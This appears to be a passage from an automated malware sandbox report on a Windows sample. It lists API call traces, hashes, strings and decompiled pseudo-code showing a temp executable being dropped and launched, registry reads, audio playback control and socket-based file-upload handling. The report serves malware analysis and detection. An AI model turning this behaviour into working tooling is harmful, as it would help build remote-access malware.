                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • exit.MSVCRT ref: 0040A97F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                                                                • exit.MSVCRT ref: 0040A9A9
                                                                                • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                                                                • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                                                                • exit.MSVCRT ref: 0040AB2A
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                                                                • String ID: .exe$WDH$exepath$open$temp_
                                                                                • API String ID: 2802067201-3088914985
                                                                                • Opcode ID: 91a4b90af5407b5c611c4e811b9554bfa2c18ac8904ed8204e6ccb714b4e2a2b
                                                                                • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                                                                • Opcode Fuzzy Hash: 91a4b90af5407b5c611c4e811b9554bfa2c18ac8904ed8204e6ccb714b4e2a2b
                                                                                • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
                                                                                			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				char _v68;
                                                                                				char _v84;
                                                                                				char _v88;
                                                                                				char* _t35;
                                                                                				char* _t36;
                                                                                				char* _t37;
                                                                                				WCHAR* _t38;
                                                                                				void* _t43;
                                                                                				void* _t47;
                                                                                				intOrPtr* _t50;
                                                                                				intOrPtr _t78;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr* _t88;
                                                                                				void* _t91;
                                                                                
                                                                                				_t30 = __eax;
                                                                                				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                                                                				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t30 = E004135DE();
                                                                                					_t91 = _t91 + 0xc;
                                                                                					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				if(_t30 <= 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					if(PathFileExistsW(_t30) != 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                                                                						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                                                                					}
                                                                                				} else {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                                                                					E00412E4E(_t30);
                                                                                					_t91 = _t91 - 0x10 + 0x14;
                                                                                					L4:
                                                                                					_t35 =  &_v68;
                                                                                					L0041416A();
                                                                                					_t36 =  &_v52;
                                                                                					L00414146();
                                                                                					_t37 =  &_v36;
                                                                                					L0041414C();
                                                                                					_t38 =  &_v20;
                                                                                					L00414146();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					mciSendStringW(_t38, 0, 0, 0);
                                                                                					mciSendStringA("play audio", 0, 0, 0);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                                                                					E004020C2(0x41c178, 0xa9, 0x415664);
                                                                                					_t43 = CreateEventA(0, 1, 0, 0);
                                                                                					 *0x41c1d4 = _t43;
                                                                                					if(_t43 != 0) {
                                                                                						do {
                                                                                							if( *0x41c1d2 != 0) {
                                                                                								mciSendStringA("pause audio", 0, 0, 0);
                                                                                								 *0x41c1d2 = 0;
                                                                                							}
                                                                                							if( *0x41c1d3 != 0) {
                                                                                								mciSendStringA("resume audio", 0, 0, 0);
                                                                                								 *0x41c1d3 = 0;
                                                                                							}
                                                                                							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                                                                							_t50 = "stopped";
                                                                                							_t88 =  &_v88;
                                                                                							while(1) {
                                                                                								_t86 =  *_t88;
                                                                                								_t78 = _t86;
                                                                                								if(_t86 !=  *_t50) {
                                                                                									break;
                                                                                								}
                                                                                								if(_t78 == 0) {
                                                                                									L14:
                                                                                									_t50 = 0;
                                                                                								} else {
                                                                                									_t87 =  *((intOrPtr*)(_t88 + 1));
                                                                                									_t79 = _t87;
                                                                                									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                                                                										break;
                                                                                									} else {
                                                                                										_t88 = _t88 + 2;
                                                                                										_t50 = _t50 + 2;
                                                                                										if(_t79 != 0) {
                                                                                											continue;
                                                                                										} else {
                                                                                											goto L14;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L18;
                                                                                							}
                                                                                							asm("sbb eax, eax");
                                                                                							asm("sbb eax, 0xffffffff");
                                                                                							L18:
                                                                                							if(_t50 == 0) {
                                                                                								SetEvent( *0x41c1d4);
                                                                                							}
                                                                                							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                                                                								CloseHandle( *0x41c1d4);
                                                                                								 *0x41c1d4 = 0;
                                                                                							}
                                                                                						} while ( *0x41c1d4 != 0);
                                                                                					}
                                                                                					mciSendStringA("stop audio", 0, 0, 0);
                                                                                					mciSendStringA("close audio", 0, 0, 0);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                                                                					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t47;
                                                                                			}


                                                                                APIs
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                                                                • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                                                                • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                                                                • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                                                • #16.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                                                                • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printf
                                                                                • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
